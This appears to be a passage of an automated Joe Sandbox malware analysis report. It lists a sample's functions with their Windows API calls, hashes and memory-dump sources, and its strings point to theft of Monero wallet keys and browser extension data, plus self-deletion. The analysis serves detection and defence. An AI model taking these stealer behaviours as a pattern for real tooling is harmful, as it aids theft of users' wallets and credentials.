                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: f8f2158be568b8deb450e92e0ebb84d64b791bee98a02b04b5da5fc49064b101
                            • Instruction ID: 80bb70efd7d5ee72a1288718e12c99d0ec9ffd4e80c48668e55c72bc76e5ef20
                            • Opcode Fuzzy Hash: f8f2158be568b8deb450e92e0ebb84d64b791bee98a02b04b5da5fc49064b101
                            • Instruction Fuzzy Hash: 17011EB5500108FFCB04DFECD984EAE7BB9FB89351F108248F9099B201C739AA40DBA5
                            Function 005612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005612B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005612BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005612D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005612F5
                            • RegCloseKey.ADVAPI32(?), ref: 005612FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 0262ed47245e44c9226addd1b96daea1b42fea275a8b51a54257e826d588cc31
                            • Instruction ID: 7c367a44c7a3d818e62dd2ea5628f383c3a1b0d3f940565b12fa0fcff8f051ea
                            • Opcode Fuzzy Hash: 0262ed47245e44c9226addd1b96daea1b42fea275a8b51a54257e826d588cc31
                            • Instruction Fuzzy Hash: C4011DB9A40208BBDB00DFE0DC49FAEB7B8EB88701F00C159FA0597280D7789A01CB55
                            Function 00576630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00576663
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00576726
                            • ExitProcess.KERNEL32 ref: 00576755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 5a710cc28a443464432ead690494f5e2472693f74d93d23ed1944431eccf5938
                            • Instruction ID: 37c14931c7c7aea8645551292647dd766a7507228348318bc3dfcaa6ddde0f1e
                            • Opcode Fuzzy Hash: 5a710cc28a443464432ead690494f5e2472693f74d93d23ed1944431eccf5938
                            • Instruction Fuzzy Hash: FC312BB1801219ABDB54EB60EC89BEE7B78BFC4300F408198F31966191DF746A48CF5A
                            Function 005787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00580E28,00000000,?), ref: 0057882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578836
                            • wsprintfA.USER32 ref: 00578850
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: d7fc39a804ff8170a678253403c628089207a362936e7f16d733ee35a9383742
                            • Instruction ID: 962c7ae1db9ed7fdea8b210ed34292a095d15f43ae1cbc92f56a87dea8dae792
                            • Opcode Fuzzy Hash: d7fc39a804ff8170a678253403c628089207a362936e7f16d733ee35a9383742
                            • Instruction Fuzzy Hash: 3221EDB1A40204BBDB44DF94DD49FAEBBB8FB89B11F108519F605A7280C77D9901CBA5
                            Function 00578D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0057951E,00000000), ref: 00578D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578D62
                            • wsprintfW.USER32 ref: 00578D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 6cc011f60438f7e4f16d7a39d17493ede09ca923636cf2bcfaabeda333c425a0
                            • Instruction ID: bc65c4489cc8b36cec50863d2fb38bd5e38e86f6c7bcbc8a1929c74c93c93aca
                            • Opcode Fuzzy Hash: 6cc011f60438f7e4f16d7a39d17493ede09ca923636cf2bcfaabeda333c425a0
                            • Instruction Fuzzy Hash: 6DE08CB1A40208BFCB00DF94DC0AE697BB8EB85702F008094FD0997280DA799E00CB9A
                            Function 0056A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0056A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0056A6BC
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0056A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 0ada49e7452becd84e7fd3b6504740eee251ee38c93e6e3c221921daf8d692a3
                            • Instruction ID: e71ea159807e1517f58bfef6152ecb32d85b371629c21e61c64d0171412b760a
                            • Opcode Fuzzy Hash: 0ada49e7452becd84e7fd3b6504740eee251ee38c93e6e3c221921daf8d692a3
                            • Instruction Fuzzy Hash: DAE100728101099ACB05FBA4EC9AEEE7738BFD4300F50C169F51B72091EF346A49DB66
                            Function 0056D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056D481
                            • lstrlen.KERNEL32(00000000), ref: 0056D698
                            • lstrlen.KERNEL32(00000000), ref: 0056D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0056D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 834615cba2eeed77338aa616fc0e983891f398f6e10fb8efbad2507fa4f75330
                            • Instruction ID: dc60e2670c97d6ffde14bc267ba78ab1c3914bbd5b56c8f55b262e0983c8e80a
                            • Opcode Fuzzy Hash: 834615cba2eeed77338aa616fc0e983891f398f6e10fb8efbad2507fa4f75330
                            • Instruction Fuzzy Hash: EE91F1729101059ACB04FBA4EC9ADEE7B38BFD4300F50C168F51B66091EF346A09DB66
                            Function 0056D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056D801
                            • lstrlen.KERNEL32(00000000), ref: 0056D99F
                            • lstrlen.KERNEL32(00000000), ref: 0056D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0056DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 494f253a676379e1f7834b80055911af666902b77ac1164cb52dee099144a267
                            • Instruction ID: 7de9e13a0d2701595defd1222fe7387646b6bd4aada461734d7a7a51ae2e59db
                            • Opcode Fuzzy Hash: 494f253a676379e1f7834b80055911af666902b77ac1164cb52dee099144a267
                            • Instruction Fuzzy Hash: F481E0729101159BCB04FBB4EC5ADEE7B38BFD4300F508529F51AA6091EF346A09DB67
                            Function 0056F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00581580,00580D92), ref: 0056F54C
                            • lstrlen.KERNEL32(00000000), ref: 0056F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 2261c7a9d7a92a9e4b4532d8263889233b925607dadf0f4ca530824463461fe0
                            • Instruction ID: f6d08d9dfdd8a97968f17630c47080d4e0cd6537e8d1aebdf1a6a75036bd80ac
                            • Opcode Fuzzy Hash: 2261c7a9d7a92a9e4b4532d8263889233b925607dadf0f4ca530824463461fe0
                            • Instruction Fuzzy Hash: DF51C171D101099ADB04FBB4EC5ADEE7B78BFD4300F40C528F91A67195EE346A09DBA2
                            Function 00573560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
